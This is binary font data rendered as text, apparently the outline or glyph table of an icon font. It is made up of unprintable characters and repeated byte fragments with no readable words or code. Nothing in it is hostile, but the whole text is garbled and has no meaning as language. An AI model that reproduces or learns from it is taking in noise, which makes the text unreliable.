�/B//B��`�0R232+"&=46;5.=46;26=463"&=462#";#";#";P	WA8		�		8AW		B19T	hP88P8UUUUUU	0Bc	"				"	iD(		*3NM80	�8(�(88(  (��@�#2+"&5463264&"74+";2�c�����`�� Y8����-27?DI%2+"=4;5#"/&54?6;2%2#!"&546334&#5265#264&"5"75#`@

��

@%%@�P88P8p%@@%�7
X�
��

@
��%�%�B\BB\b@%�@%������
(%67#"/&?6'&?667'&?6Py�p�
��	

a<0heC>Wh0�

�

	��$%2p������+2#!"&5463"26454&+"'#";26P���4&&4&0'*'
	�	
��`��&4&&4�""����� 76&7>.'/&4�4PL20#	.6"��

P	)B,,U2&
X
�����'.54>?62>7'�.=9*M@'	�Kc�l?sSC)C_�G
P�F%�lJ����#2#!"&5463264&"74#!"3!2�������H��`�� Y8����@�
&.BLT2#!"'&54%"32?4761.264&"6264&"%6.'&3654'73264&#"264&"��'	�D	' 		
			�C
=#	n	L


.��wNCCNwi		

���5
		�%�@�/!!$3#!"&=264&#5463!2"'4&#!"3!265�@���� �L
��

P
 �t(``(``8

�

���$"&4622#!"&=46;27<xTTxT5K�`K57#L#�TxTTxtK55K���+2#!"&5463'76/&'&??6��`LCC		(		BB		(		CC		(		BB		(	���`��BB		(		CC		(		BB		(		CC		(	���� &,%#"'67'&477&'6267&'%6'77&7p!HddH 66 H�H 67���T'FF'!D�D!&FF&!D�D"MM
CC�MM
BD����
 &+'6'676'7&'%'67%&'667�*N5i.9S?��N7M
<.�4b�.8S?^N7M
��.�4b�*N5�M7N,�.Fb4"N*E�.�?S,.Fb4"N*E�.�?S�M7N,����2"&4264&"6264&"264&"�Α�Αk`��Α��'Z�����!CK_s�7'&6;5#"=4;54;232+32&'54;2354;2354;2#6'354&"+"=4?54;2#+"=4?54;2'##65#"=4;2L"33"�4�
/		x�����~��_

_[FF>45=#		{##**�g33g��@�&2.546;22?#5.54>#!"=43!2{0$ xq�!5���(r

9xq?3&(::(&&\M�m ���#'+/37;?CGKOSW[_cgkosw{73#!#53%3#%#53#53%5353353#5##5533#3##553%3#%3##5353%#5!53#5#5%3#3#'3#73#'#57#53#535353�@@@@@�@@@@@@�@��@@@�@�@�@��@@@@@�@��@@@@@@@�@��@@@@@��@@@@�@@@@@�@@@@�@@�@@�@@@�@@@@@@��@�@@�@@@@@@@@�@@�@�@�@@�@@�@@@@�@@�@@@@@@�@@@@�@�@@@�@@@@@@�@@�@@������.#!"=43!22!'&6;5#"=4;54;232+���h
V��V�22$228
��"0$22$0����%19%!546?>=#"/&=4?'&54;22#!"=43"264`��9
<	�Pp��0��/'

2/�
	p��P��0�#/!#>5#"=4;.546232+2#!"=43�	
 (1F1( +��%@%
)#11#)
;X����@!"=43!22"&4!&54?632>74>;2276;23276���h�/!!/ (i��i(
)D)@!.!!.z��
&)) &
����%-97'&=4;23546;23546;2!67354&"#!"=43!2Q-(0H0(- �� P@���h�*x,,,,x*{nnR@@
�����/S2+"&=#"=4;54632++"&546;2'2+"&=#+"&546;235463h

0

@
0

0
�

0
�
0

0
�
`
��

h0h
�0h



h�
�p

��

�

��
����
Q'&'&'&'>7'&'&'&??6/7?6/7?6/76/&�
�63�4
�63�g��gf�45��[45��o��o�T����#-8B73+"+"=4&+"&%#.54622654''4''32674''326`�

(

@$�-5z�z�H
@ 


�5,&]7Vzz�/

M�<62"'67"&5�Ԗ�Ԗ7��7�Ԗ�P88P8((n(88(����#5%/6?6&67>32"&54>'7>76W
�65_<Q	"..C.�
�";V"�
�m($*
 pJ�/B//!A
�+m7+�	���!!�@����	�
'%&'762&/"/&4?'.72"&4�0q"�8?�?/�)$Y5g#	>P88P8� /�8??/��$g5Y#Q"�8P88P������$,87&'>7'&67&'&'6327&'67#"'6'6&�n$%_E$>_GE#�61Y0253�LS'*F�>!3v�E[E<
�0K*--'�E|#/Fr 1Nc>P�& ��]2�U(
1)++FR;$/�D_5E�������:BJRZbjr2+"/&>5462;2=462;2=462;2=4264&"6264&"264&"6264&"264&"264&"6264&"��}
!	�							I							I			)			)			P
�q�!
!�

��

��

�H
��			W			�			W			)			I			w			 �`	'/746;#"&52+!&"264"264&"264"264&``&@&&`��Fn &��&&�&@��@���RnR���	0#532'#617>3!#!"&5����3c�`�
!������@�)>%2+"&=46;75%"&=46;7532#2+"&=46;750		�		P  ��		P  P		�		�		P  �	�		�	``@	�	``	�	@	�		�	``���92#!"&546;546;2'3554+54+"#";;2=32��`P��� 808808@�� 00   �088088����
"&5462654'�Ukk�kj,T6``�M�:^vv^:���5*8ii8*��G�%/%#"/&'"&=46326763254&"7'&#"+'$<"�B\BB.-@
$<"��(#RA�']1�
�.BB.�.B>,!1�pp-:]	)����-2#!"&546;462&"2646/&'&7P��P&4&6a			j.			R	���`&&�	j/	T����%-5AMY2#!"&546;462264&"6264&"6264&"6"26454+";2=4+";2=4+";2P��P&4&��h���������`&&��RR���hh����3;CK[$"&462&"&462'&67676563267'&'#5&$"264&"264&"&4622#!"&=463�			�H44H4��7VJ<E /

27�81
7n�			�		��		�			G4H44H�	
 #
	[[n			�	 		 	������<AGM>7.'&6;2!676;23&'67+"'&'!+"&67#7!36!&'# B--B 
 8 

*M1,"
 *9
 �� 
�$����	��
�./DIID/

(?9@$Z8		h����B�5=%'&>?7'76&'.'&7#"&=46;276264&"&5>!=!=<���D-+,\Y		pd-���((��cc�5)G,8,7#	 	��$G�((����B7"&546;7532#2+"&547#"&547#"&5#"&=46;2�		�00�		 		S(�(S	0		`	�		�  �	�	@	 				p	 		������6#532;#!"&546;4+54+"#";;2=325y�
7
�
��

�@808808W
��
��

�
��88088����/8;#!"&=32?3264&+'&"'&+"=4;546;#532 
�
��
F#
9Z		F#
9�8
ș�
8
��

�Fr,		Fr(�
i
���@�	
)346;#"&5!%;;2=32=4+54+"#"%2+00�@�808808P0p�@0��@�088088������@�%1=Ieq}2#!"&546;546;254+";2=4+";254+";2=4+";2754+54+"#";;2=3254+";2=4+";2 
	��	
�
�
�((((�((((�((((`
��		p
@

@��((�((t((�((���((�((���#2"&454+"#54+";2=3;2�Ԗ�Ԗp0`00`0��Ԗ����XX�XX��@�.82#!"&546;35"26426'.+"'#"3#546;2� ��F4&&4&
"*
��
@
���```�&4&&4�


�``
����9E2#!"&546;462&"26454+54+"#";;2=32=4+";2P��P&4&6H808808�����`&&��088088�����8<@7"&=46;7532##32#!"&=46;5#"&=463!25#!5#�		p@@p		�00		��		00		`		������	�	�  �	�	�@	 		 	@	 		 	@@@@@��D�'2"&=454&"7.7>/&76B\BB\B�(��/vT"�S	#�/�B.�.BB.�.�pp�#	Sv/7Tv/�"����!15!#!"&=32=4+532=4+532=4#72#!"&=463 @
�
xxxxx�

��

@��

@@@�
0

0
����52#!"&=463!#!"&7;;2=32=4+54+"#"h

��

@
�
@808808�
0

0
� `��
�088088����#?G%2+"&=!+"&546;235463'"=4;276232+'"/"&462.B	 	�	 		 	�	��2f		z2L4&&4&�B.�		00		`		�	�(c		7		,c		7�&4&&4����IQY^%2+"&5#"&=32=4+"=4;2=4+"=4;2=4#!"=4;5463!232264&"264&"75'#p		08P8�8P8�������8,d�,((\((�d,`	 	(88((88(�00dlp((((�dp����#37NZ%2+"=43+"=4&'&=4;22#!"&=4635#+"=4'&=4;22+"=43x0).0$0p		��`�0$<0X0`��	W1&B%>>��	�	@p@@B9!,*AB>,��������>7//&?'&??6/7?6'7//&?67'&?6�@��&@BC87-8�-I"�"9-A��CB@&87.8�-J"�"8-������$.2#!"&562#".'463/&76.76dx[	��	/	[<7*T	#�/F�/vT	#M::c:M$1kTv/�#F�#	Tv/�����(#"&4?57?6/7?6/7?6/7>�#�dYY-22-22-23.M�!R�YYe.32.32.32.������/#"'&6?'&?67'�"�+/�"FO�"�$ R�"�EO�����';?"=4;2+"&=3352#!"&=463"=4;2+"&=335H�/B/0@�		��		X�/B/0@�00�!//!�``��	 		 	�00�!//!�``����#A%2#!"=432#!"=43%2#!"5743%+"=4&#!"+"547%62���p��p���P��P`00`00�00� ���

�W q���!22#!"&546;2654'"&462'"2654'76.�&&��&&q�qd�^^�^�""�&��&&@&-3OqqO3-�^�^^�:O����3}62"&4"&4622#!"&=4632#!"&=46;!'54+532=4+54+"#";#";#";#"26=3264&+532=4+532�			�			�		��		`		��		0`�hhhh��hh@(@(@hh�@						�	 		 	�@	 		 	`���    ((  ������"-%2?/.=32?7/76!6/.7��
��
�@@��\����\��'�66�'kkp8� 

 �8�����$,2#"'#"&'&>7&54264&"264&"264&"�Ԗ�j83AL9s���z�z319JVv������$747#"'#"&767&'&?6632@	E&(83AL,9:
��	

iI`j�9��
3
4+9�

�

	R5zVH:��974&+463!2#"!%2+"&=!+"&=&546;2!5463�& 8(@(8 &���& 	@	��	@	 & 
�
�&(88(&@`&$y				y$&
``
���Fh$"&462'+"&;26=>54&/&546;2?6&'&'54&+"2#!"&=46;#"3!2=4+67V�zz�z�"?
&
	
">
'

�

�@

 +?

l

@, z�zz��$!




$!



��
`

`
''�����	)1&'67673+#&'&6?&'&54762546264&" N5 
,pp ^BMA
k.�U}N/			;1%
E8K@�B^8H$Qh=7	
EX<!/`			��A�%%#!"&=46;76;2+";2?625���		7/ *�N		v]	x
	y	`	&		J��A�8%'&6767>"#!"&=46;76;2+";2?62m=<m���		7/ *�N		v]	�rHHrH
	y	`	&		J��!�>e.'&67546;2'&+"+"&=&'&4?6;254'#!"&=46;76;2+";2?62		 	2		!	�

���		5+'�	J		pX	0%			%			�
	y	`	&		J����"E7+"'&/&=4622?6/&>$2+"&=4?>2?54�9	�i
Z
&�
i�	9&

Z�M"+p		�
�

�l
	3�
�
�		p+"M
3	
l�
������%@2+++&/&6?54?26=%54&+"&=4?6;76�


&�gPPA*<*,P!�"!gg
0
@
&<�.0$'z**8%.!X~	
<�����5++"&=47'#"&7>7#6;5#462#327#4'
	�		�
�	
.C)>t0pQ^Qp0t>?X
��		
��
$A,Dl��RnnR��lDT������en"&462"&462#"/?#"#.?6?'#&/&/"#"&/&?676546;2?676.7�((d((N)
C
	


+3�3+



C$
	�	
#��)`((((�pE.d L]
\1G
!!
G1\]L P 
'"
`		`
"'
 �.E
����@�CKZ%2++"&=#+"&=.5#"&7>32+";>;26;264&"'"4&54621&#0		1
	@	�	@	("
+X:�, 
i			�8P8�	�	
Q		00		Q'0&	7I"L@			�(88(������)?/.%'.4>?6762'67&"uO[D	�	E
�
,
"k
,"O4!Z!�Xf#	II@&W;���&.;C%2#!673264&+"&46;&5462#"3"2642.54264&"�(88(���

`(88(--8P80`

m�xP80 5S�8P8!8P8@ (88(P�8(P&V(H���2+"&="&5%3&'>@]�	 	]��@tU+)2;`�]�		��]@V�	=/*���#'2#!+"&5#"&=46;546;25!�		��	 	0		0	 	 @�	 	��		p	 	0		0��������"/<62"4&"276'.#"?62&276&"�Α��7�

%
&�-�-

#nYΑ�Α						o66*����!2"&42#!"&462&264&"�4&&4&�		�p]����C�P88P8&4&&4�	 	����]^B@8P88P������)17'&>?7'72&!#"&'/&7%46264&"21M>M2�LB.-A�w
Z�((H�\]�:~�p.B?-l.^D
�@((����)19?G%+"&547##"'#"&5463!232264&"264&"%3'&#264&"m	/B/�/!((!/
�
&��0\+�V	!//!!/  /!P

`��0+�������&/'&?632576%5#!"&z

���%	

N� n"��n
��

	�!

	=��K�
���
����%�2+"546;5.?4>;2��(4@�	@4uW7��7Wu������!'&?6>323!"&=46z
��	

�M2<T!�0���O


�

	i/=T<0&3�
7O����.6RZb7"&=46;>3232+"&'7;26=4&+"/?+54&+"#"&=46722"&4&2#54@		P0.%			P`P8(0(8�H$$$$�3EP
�
PE30p			W	 �	`	+5$	`	+55+X(88(Y$$$�L3
@

@
3L`					00����+$"&4622#!"&=46;27%/&?676jKKjK&7O��O7#L#T	�	Q			-i	�KjKKjkO7**7O��	R			-h	����+3$2"&454+54+";2'!"&=46;2732&"&462�xTTxT�
&


<
�(#��O7#L#
+jKKjK�TxTTxB
6

L
,L*7O&HKjKKj����;CKv%/'&=&''&'&?&7'&767667547676264&"&"&462#!"&=46;2732332?b
!!

!!
�((�jKKjKI��O7#L#


	K    0((tKjKKj��
*7O

'����$/$"&4622!"&=46;277&7%'?62jKKjK&;)N��O7#L#>�G�=*H%�KjKKjk.M=
*7O��G��*H&����#76"&4622#!"&=46;27$"&4622+46=4'6;27�\BB\B#0C��C0	!F!P88P80.B�(*�B\BB\bC00C 8P88PXB.'9+����:%#!"&=467&4?6"&547'+"&?&5475?6K��K6_���`KjKB*M6

6M_P..5KK55
>	>
;����3;%!"&=46;2730&"&4622+"&=46;5462#54&"@	��O7#L#+jKKjK

�

 /B/0��*7O0KjKKjk
�

�
0!//!00

0����+%2+"&=463"&4622#!"&=46;27p		�		�jKKjK&7O��O7#L#�	 		 	0KjKKjkO7**7O����%-%#!"&=467'47&52>32#"&'7"34&#E4G��G4e�++1#5KK5,Cg
�
�L4**4Lf�33(KjK5)`

����7%'.54?6>7'&"&462#!"&=46;273230n$"5Ps!;`�jKKjK 7,	
��O7#L#�$@/&sN-�N:&KjKKjsDm#*7O������!'&?6>324>7!"&5z
��	

�#8!5K0&��3��


�

	r 6K5)B
� 9%�����+@%"/&=46;22>4.#"'".54632#!"&=46;2732w	
\		[O\
�#;"K5#;"KK:��O7#L#S		]		[O
E
X";#5K";#5Ko(:*7O����$"&462#!"&=4677'3jKKjK 5K��K50  `  �KjKKjlN5**5N��88�����;CKb��%/'&=&''&'&?&7'&767667547676264&"$"&462"&5462"'&#""#"&=46;323630#3273'#"&=46;2b
!!

!!
�((��4&&4&�.BA]B	

f�D/	!##
�(B
&@k    0((t&4&&4FB..BB."�


0C '	�:#
 &���;?%2#!"&=463264&"";#";#";!'#"&=463!3'#�%
��
%sH���ri�	g��QQF@% 

 %`�@@@`�@����@�"6#.5476'&'"&546
�OM{O�
����'	l	//	��	'R	����$9Kil"'&476;2#'+"'&476;2%+".7>&'&>;22+"&764'&63&/#/.7&54>23'�"		_		#
#		#		#y"		R�1�1�"p`06
,
�4]+	9|9	9|9	)[6@6
,
d��
vv
:�t����)%/6?6&67>3%'7>76W
�65_<Q�	�";V"�
�m)$*
 pJ�
	�+m6+�	����
!#463!2#2#!"&=463!53`@�@P		��		����x��`��	 		 	@@������472+"&54632276&"&4622+&'3533!&#5463�/A�A/(P88P8P�	L�@��!`B//B 8P88P��&@@ 2.����-7@%#54&"#54?5#"&=46;546;232+46?#"&5%+5�`%6%`p0		0	 	0		0��mp	m	p�	�`%%`�	D3	 	0		0	 	3�	/�	�d	����	(085 7"&5"&46232>7"&5%567$2"&4&'67==q�q��qq�q�h:&H>q�q�?!#���pp�p�0n37++++&&@&4&&4�4&&)?+	�/B//B	"%+����2"&44635"264&"62"&4�Α�ΑX^BOq�P88P8S��Α��gB^ qO`8P88PH����)12/"#"+/#&54754632264&" (8`M=),'&,ayt/!'J�%PAepxhx=	%!/ H����;!2#!"&=4632#"'!'#"&4626?&5462?&54		�`		�(H��H(HR(RH	 		 	@(��(

+��+

����(08@HP2+"&=7>'264&"'"/&4?62264&"264&"6264&"6264&"264&"P��	
�(��(����.�1��(��(���rr�����'/72#!"&5463264&"6264&"264&"264&"6264&"�%%��%%3ss�%��%%@%���ss�����'/2#!"&5463264&"6264&"264&"6264&"�%%��%%3��%��%%@%���������2#!"&5463264&"�%%��%%��%��%%@%�����'/7?2#!"&5463264&"6264&"6264&"264&"6264&"6264&"�%%��%%3��%��%%@%��MM�MM����'2#!"&5463264&"264&"264&"�%%��%%3ss�%��%%@%�ss����2#!"&5463264&"264&"�%%��%%3��%��%%@%������62"&46"&4622#!"&=463�6%%6%[6%%6%�

��

`%6%%6�%6%%6U
 

 
����!!2#!"&=46;463!2&264&"p		��		p m	 		 	��s�����"*!2+#5326!"&=46;467264&"p		�`p���		P
�	 	�@����!	 	m�0�P%2#!"&=463%2#!"&=463�

��

�

��

�
 

 
�
 

 
���"33&'"&476&&67>7>�'
!�b'�bGE:B�)!.,_Q�'g9,'1B�5t*"-,!����@�9A32+'6.'&"?632#!"&54>7>2264&"�:)
�b6
	Zw	F#
 #& #O
	��&5HX0,:,S_#Vi
	~,
	B0
	%1]L<%%%C���@D!2#!"&=463'.=4&+!46;23226=.='&4?625#P		��		�/!%��&�&$4&��	 		 	U� +,p`&&�4$ 

�>&�����@�CP]%+"&/#+"&=4?>/&6323632'&'&&/&6?67&#";26%5&#";26>C0%.B$B.%0C-
C$'));7J7;))'$C
��##%$%6$%##%�F/C=,'',=C/F�&%
	��	
%&��)

%%

)������%&/&6?'.?>n��	��
	�"	�	ff
	����(.?>&/&6?2#!"&=4637

.��

��

�p

T
xx
D�
0

0
������&,>%"/&6;235#"&=463!2+2#'3.#!"&=463!260
V� 	(+а		�		�]�
�}#4�!#��		F
@
s@l:@	 		 	@�]
�|4#��	 	 �`)2#"'#"&4632627&#"!2>54&#"�FccFQFFQFccFQFF�////!+L+///`^�^OO^�^OO�@@&
&@@����@�4@D%"#"/#"+"&=#"'+"&=.54>76;2264&#"5@
JLL				,4$0	TFCP
.Ew
	h��1	;		16		JY4)D&
0.=K	
�c	����%'%&=467%6m
	��3	�Z
	�"	�	f����&7&=47%6'2#!"&=4637.


��

D

�p

�xDD
B
0

0
�� $H!5>4&'5463!25#35#35#5!#54&"#54&"#54&"#54&"���
@
�`@�@�@�`�@		�		�		�		=	cc#

��������``







������5U'&?65462#";#";#36=46;22+"&=46;5.=7z	
��	
�8P8UUUUU),		L		�		8AW4
<)2


	�

	�-(88(   0		0*&�				"	iD)(9'"����&,4:@#"'&#"#"'&54632326322>7&.#6264&"575&'m	+1>�>?5
+1>�>?��$"%�B//B/` ���	
>=
>d=��$8P88PT:�1
#����&#"'&#"#"'&5463232632264&"m	+1>�>?5
+1>�>?��B//B/���	
>=
>��8P88P����	%1=G1!#!"&%;26=4&+";2=4+"%3!2=4#!";2=4+"2!5463�
��
�	`		`	pp��0����0	��	@��
� 		 		Xh@	00	����KWco2#!"&54632>54&/&546;2?6'&'54+"+"'&;25754+";2754+";2=4#!"3!2`

��

�	-	-	�pp�PP���
��

�
��	



 h����3%#32+/&?#"&=46;7#"&=463!7632�bK�

�S	

37

�K�

R


4
�`
 
j		
C
 
`
 
j		
C
 
�����%-56+".7>264&"6264&"6264&"264&"�P�U&P&(/hP)
n/3���=N&@";*P}CJm��m-S����"*2#!"&5463264&+";26=72+5����(88(`		 	0

0���`��8P8	�		0�@����"&462"&467"/&4762�%6%%6%�%%6%%F

��





%%%6%%�%6%%6%�

��





����$4%2+"&=4633#"'#"&=46;2%2+"&=463�

�

@��@$I`

�
�

�

�
�

�
  @0p �
�

�

�
����%1=I6/"/"/&54676276254+";2=4+";2=4+";2f&6
66
6&&6
66
6�������	
� 
	------	
�
	-----��hh����	!%-15=G546;#"&52#!"&546;54625#6264&"5#35#6264&"72+5
  
�!/&��&/!p`@""�@�@""�

 �
�
 /!��&&!/@

@��  x""�    x""1
�
�������7&/&6??6/7?6/7?6/7?6/7?6/76|�PE<
<87<<77<
;E���'ef/0ff/0ff'���#G7&546;2#";#";#"32#!"'73;2=3;2=3;2=��
`
88888x

�@�)@@�)��

 @@@
`
�888888@@@72#!"&=46;;2=3;2=3;2=3;2=3;2= 

�

0@@@@@
�

�
XXXXXXXXXX���/73+"&546;2#";#";#";#"�X
�

�
XXXXXXX @

�

@@@@����	/7A546;#"&52+"=4;27#54&+"#4?62264&"%2+
@P	h0��	`	��3B//B/p
	P�
��	@@(@
���		�u
k�/B//B
��	@���	#.'7562"/&47�@`>SS�>+u5�@�SS>�+>u5����!4"&46;46;#"%2'&/52>76#"'.#57676�%% �%  ,IfHM-4#-:+0�MH2N/80+:-#3 %6%���6%��2.&B

�	 B&, 	�
���*2:2+54+"#54+"#"&?6'.54264&"264&"�Ԗ*	N@N		,2�4&&4&�4&&4&��]"A6B8888B Z4]�&4&&4&&4&&4���	/J7546;#"&2"&427735654&#"32+'2+"'.#".'46;2`	`v	6Ԗ�Ԗ=2��$q| 3$qO=2|�		#,#�@	`	7�Ԗ���$2=Oq�  o2=Oq$|	@	���t�3#"'"'"'#"'.?63!22767#!".=327!5Z&/,XX-/&A	�				
�@					
�I(Z!!!!!!Z(h���
		�dd������
%%53#!"&53%#!"&?63!23+"&@@
�
@�
��U	�	%@	 	@��

��""����		���/"&=463!2#2#!"&=4632#!"&=463		�		@		�`		`		�`		@	@		@	P	@		@	�	@		@	�����7'7'772"&464/76/&'7?6/76/&'&'76/&'&'76/&'&?'&?'&??6/7??6/7??6/76/&'77'7�---�-------jԖ�Ԗ�.""--"!-.""--"!-�---�---D---�---q�Ԗ�Ԓ-"!-.""--"!-.""-3---���+/M%#54&+"#54&+"#54?6;546;232'5#53#!"&=3;26=3;26�	�	 	�	 	�	.	
3�3
	����
�@
�	 	�	 	�	
S				S
	.	PP		@@�`

`				������%/&#!"&=4&&/&6?267w9
9
�
99�?L?`
r		�

�		r
`��C�:I"&462/&/&/&/&?.?67>327"&4?6�((.		-
<"	#8	�(	;
	2
`((�E2Y


JB"<	 	*"�4
,"	<	
2	���$2#!"&5463!2#!"3264&"��s%%p	��		C@�%@%			�����$6O2"&42654':12764./&>'&"67627>'.3232654'�Α�Α�P
�b FbP
��Α��W


	�&&�

	��@�"2!2+"&=4&"+"&=46;!2#!"&=4630		�	8P8	�				��			 		�(88(�		 	`���	 		 		����	#:BJ%6?#&''#>#6&'37.'#!"&5463!2"2645!"3>-''-V
."'--'L
�

��)77)F�jKKjK ��
�1) )#*)1�1))*#�	4
	7)@)7&KjKKj��@������,x�7327/"&?#'&/32767672>367'&"&'.'&'.'&764'&7>76767676276&2654.#"a4%4	
.
	!
	4%4	
J
		
	

	

�7N7+'U
�&p
Y&�



	
	

	�P88(,����-2#!"/&4?63'76/&'&??6@%%���		�>>>>>>>>�%�%�

��>>>>>>>>����'7M]2+"&=463#>7##"&46322+"&=4632#"&'##&'6=3>2+"&=463p

`

@629*P
%% %

`

%% P*926U 

`

�
`

`
8H'?0O	
%6%�
`

`
%6%O0?'H��
`

`
����1;#"'&54675#"&=46;2+7'&?6/'!&/5#.�&4,		�		'	4	+�%%`@!,34Y�	 
	 
�'	4	+.53,!�''
������	#2!54635!+"&=#"&"264`
��
 �%@%6%@%��
��
��  %@%%@%M���4@HR\d2+++"&=#+"&="&=#"&=46;5462%;2=4+"264&"75#";26=4&+264&"�


 
�
 



�������=�p

�p

ps@
P
� 

  

 
�
P
0".."08��]�
`

`
�������[%#"##"'&'+"=#"'&767"#"'&4767.'4546320454>762>7632�		<I		%((%		I<		 ,+	"S!!	
!S"+-X	@@		!V#

)5p(
.0F!)
	#V!	���)"/&4?62762'&4?62762"����$p���{*E�*����%q��|*E�*�����@�-2+"546;5'&63!22#"'73264&#"#>(�8�n��<TT<(#$(88(,
4J}��}�TxT$	8P8+5�)!4675#"&=46;2+2#!"&=463 Rn�@nR		`		�		� 		=~TT~				��	 		 	�����%-5=%/././&54?>?6264&"6264&"264&"�$
E'*M+7
$!E'*M*7
��3��*'E
$
7+L
E"$7+��������#+3;%/././&54?>?63264&"6264&"264&"�#
E'*M+7
$!E&*J5J��3��*&E
$
7+L
E"$4J5Jq�����1%2++"&5#5323#"&5#"&=46;546;2�

(
0
��
���
(

(
0
`
0
(

H`
�H��`

0
(
 �`'3?K[g2#!"&546354+";2';2=4+";2=4+";2=4+";2=4+"754&+";2654+";2`

��

���@@@(	�		�	��`
�


�H00		0		y����!)A2"&4>/7>.'&7264&"7'76.'&?>�Α�Α�
c4&&4&���Α��>
�&4&&4����@H%/67#"'".5'7&'&6?67&5462'0"0"132676&"264�767,RL\142G6G!	D8P84#03C#"9d
�h`:_~)= {:|"

v(88(Y$
Xt7/

���C�-D54&"54&"&'54&"&=4632762654.'&'&6?*#"�7?@:FF:@�w('�
��c�9%�
Wc��G6�-#`

zo

oz

`#-�5K`�/!a5/B/��@� *62"&=46/627.#"75&"26>54&'���8DF;<<"} @ &4&/&:!D8�K5�5KK5�5S,
&&

�

&&m&
,���!33#"&476&67>	-jQ�e:K? 9�2D[OV,�}n5119�."3W8.����)T];#!"&546;;2=4+";2=4+""'.'&"+";26?212?62;264&##532�
�
��

ȠPPPP�	+"		
/		I�
8
��

�
HH�	)6		2
			
�����'0;#!"&546;6&+54&+"#"27#532�
�
��

�LA	 	A`��
8
��

�
��P		P`R
���G�3#532&=#53546;#!"&546;;#"��
b�`@@��	�
��

�
��	F�b�`A@A|	�

�
�
�	���	373#"&=46%#532;#!"&=3?6/&#46;pp		��
7
�
��
�``�
Ƞ@	 	�
��
��

�A``A
����*6BR%#5%#532;#!"&546;;2=4+";2=4+"54+";254&+";265 ��
7
�
��

ȠPPPPPP	�		�	�@@�
��
��

�
HH���		`		����&2m#532;#!"&546;;2=4+";2=4+">54./&546;2?6'&'54+"+"'&;25y�
7
�
��

ȠPPPP�	-	-	W
��
��

�
HX��





����;CL;#!"&546;&'654&+";26=3??6/76/#5327#532�
�
��

�E!!%P			;�00		ɀ
b8
��

�
��!&%	�		0;7 		��b��A�7@EO7;#!"&546;;&'.'&"+";26??62#5327#%'762��
��

�
��	+"		��
b`�D�ED
(

�
�
/R	)6		2

(�b�D��D����'0;#!"&546;26/&";;26=7#532�
�
��

�A``A	 	��
8
��

�
��``P		P�
����&%"/&4?'&?67627'"/�		�Pu_VVR		[1�;;		;Q�		�uP_VVR		��0�;;		;R
��@�
"1%"&546?"/&4?'&?67627'"/@%6% 		�Pu_VVR		[1�;;		;Q�]#%%@		�uP_VVR		��0�;;		;R
�����
-A\n�62#"&76'47'.76'4&'".76'&6&'.76'&767'.76'.'".676#"&54'&676'&'.#&#0#"&=&762�+>		";I		
(�Lm

Q9		



'"&(X<9

GKl>60�
rn	ik
`<*MK	
GH  ML	
FI)<
#.><	
79?1:kJ55
897O
z,
	'
V		<9R
fHJ*�� @`$2#"&'&?'&6>264&#"G0a@((@a0>p&X	
W&p�		`)7337)<*B
nn
B*<�	
����'/$2"&4&2"&462"&4264&"24+"36264&"N�Α�ΑP*<**<���<**<*�ΑΑ��)<**<*�  h*<**<����'2"&4264&"6'.#"7626264&"�Α�Α��	
=("
	14)��Α��*�	"
	������32+"546;5'&63!2!!��8�8��J��0����**0����j2"&446;.'+";2;2/&+";232?676?6?6=4&+"/&6?63232?65�Α�Α�	Y;		Z
	/
 	
	
	��Α��G	:R				 	
	
����_n2"&4654/&+.#"/&54?632;26/&54?6;2?6/&?6//2?676767654'�Α�ΑJ		
C	
	
G 	
	
_
��Α���
			


		G&
	
			 
	
/d/*����8m2"&4762;2=4/&4?&#"32?6;26=4/&?63254/&=4+"+"/&+";237632;2?6�Α�Α�	3Su>
		�'

	��Α��_N
	&
uS-			f



	
����!%)-15=DK2"&45#375#"6264&"5#75#5#75#5#75#6264&"5#326=4&+�Α�Α�(

 5000p000p000`(

��Α��(
8(
��((8((8((8((8((8((h�(%
(����&2"&4"264&"2642676&"'&�Α�ΑU�`Y
	/�/
��Α���6'	
'����#22"&4%2767&'&"2767&'&"2676&"'&�Α�Α8�+`Y
	/�/
��Α��!"		!"		!"		!"	��6'	
'����+92"&4$"?626'&'"?626'.2676&"'&�Α�Α[&#
&
	
�#
&
	
`Y
	/�/	
��Α��)))��6'		'����-AP"&5476227"&4632&"?626'&'"?626'.2676&"'&�(**0	�Α�gJ>/L&#
&
	
�#
&
	
`Y
	/�/
@77<03g��Α)!.)))��6'	
'����':2"&4?6&'&'&2676&"'&%>'.'.7�Α�ΑZFi`Y
	/�/	
	��Α��F

��6'		'�	
F����#12"&46/764.?64/&2676&"'&�Α�ΑP!!�!!PPX`Y
	/�/	
��Α��-0((	((00��6'		'�����/<JZ"&767622"&47667'676&&>'?6&/.?6.>'&26�*��)!)y�G!)y�G�	Z

4]Z

4�"k,<@PH)��H)
G�y) G�y) ([
4
�

Z`"a$,k���� .G2"&4?6/76&/&"2676&"'&%6&/&"?6/�Α�Α_#
F`Y
	/�/	
'#
#��Α��	##	  ��6'		'�	  	##������6FVd72"&476"'&'&61"&'?676&>32&'&&"?626'."?626'&2676&"'&f)S)
Hr s�s 
�_?lE
K&#
&
	
�&#
&
	
`Y
	/�/	
�H))GR9DD9R]:e=b)))�6'		'����%-K26=676&"'&.54264&"264&":#".=6362?>�ΑYH	*
	/�/	
*	HY��&

��gO~.$		$.~OgW�@%
?	����;HU%:#".=6362?>26=676&"'&.5464/&?'76&6%&

�ΑYH	*
	/�/	
*	HY�P!!�!!
	PPI@%
?	l�gO~.$		$.~OgA0((((00����%8@^2"&4&26=676&"'&.546'.#"?62264&":#".=6362?>N�ΑYH	*
	/�/	
*	HY�
%
&�4&&4&
&

��gO~.$		$.~OgP						0&4&&4�@%
?	����"1<62"4&"276'.#"?62&2676."�Α��7�
%
&�	
Y`Y
/�YΑ�Α						a	'66'
 �`/?O_72+"&=46;2+"&=46;2+"&=463%2+"&=46;2+"&=46;2+"&=463`

@

�

@

�

@

�

@

�

@

�

@

�
@

@

@

@

@

@
�
@

@

@

@

@

@
��@�/?O_2+"&=4632+"&=4632+"&=4632+"&=4632+"&=4632+"&=463`

@

@

@

@

@



@

@

@

@

@

�
@

@
�
@

@
�
@

@
@
@

@
�
@

@
�
@

@
���"@72+".=4>;2+"&=4632+"&=4&#"+"&=6�

�%

�Ҕ		zV8`8		�
�
@&@
�
�ip		pVz8`8p		pi���F7+"&=46;2#"&=46;22+"&46;23265454&"+"&=6�
%%
�

%%�Ҕ5%� fz�z		�p
%0%�
p
%0%`�i�%5(�VzzV		i��!�77/'7'&54%'76DC#)�#+3`3
����+ FC##�*
3`3+�+ǩ����';GS_ks&'&'&6;2+"'&'&'&6;2+"2#!"&=46;254+";2754+";2754+";2754+";2"&462�+
+
n+
+
�
%��%%+o�```��6%%6%($>($>($>($>@
